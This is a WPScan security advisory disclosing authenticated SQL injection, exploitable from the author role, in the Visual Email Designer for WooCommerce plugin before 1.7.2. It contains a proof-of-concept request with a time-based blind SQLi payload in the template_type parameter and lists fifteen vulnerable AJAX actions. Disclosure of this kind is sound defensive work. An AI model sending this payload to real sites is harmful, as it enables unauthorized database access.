Visual Email Designer for WooCommerce < 1.7.2 - Multiple Author+ SQLi

Source: wpvulndb (wpscan.com)
WPVDB-ID: D99CE21F-FBB6-429C-AA3B-19C4A5EB7557
Authors: Donato Di Pasquale & Francesco Marano
Published: 2022-12-09 00:00:00 (History: Dec 09, 2022 - 12:00 a.m.)
10
Tags: woocommerce, sql injection, email designer

EPSS: 0.001 (Percentile: 38.1%)

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.

PoC

Request (the action parameter selects the AJAX handler; the payload is carried in template_type):

action={INSERT HERE NAME OF ACTION}&swcm_social_id=socialblockdrag_XpoeK&template_type=user%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)&template_id=2&theme_id=2&securekey=dd041b294f

Affected actions and the plugin source line reported for each:

Action: swcm_social_function ⇒ SQLi at line 2725
Action: swcm_video_function ⇒ SQLi at line 2510
Action: swcm_footer_function ⇒ SQLi at line 2311
Action: swcm_disclaimer_function ⇒ SQLi at line 2537
Action: swcm_image_function ⇒ SQLi at line 2621
Action: swcm_customer_function ⇒ SQLi at line 2940
Action: swcm_delete_widget ⇒ SQLi at line 3018
Action: swcm_hr_function ⇒ SQLi at line 2423
Action: swcm_maintext_function ⇒ SQLi at line 2339
Action: swcm_multi_image_function ⇒ SQLi at line 2653
Action: swcm_button_function ⇒ SQLi at line 2482
Action: swcm_title_function ⇒ SQLi at line 2596
Action: swcm_clone_widget ⇒ SQLi at line 3087
Action: swcm_order_function ⇒ SQLi at line 2994
Action: swcm_textarea_function ⇒ SQLi at line 2284
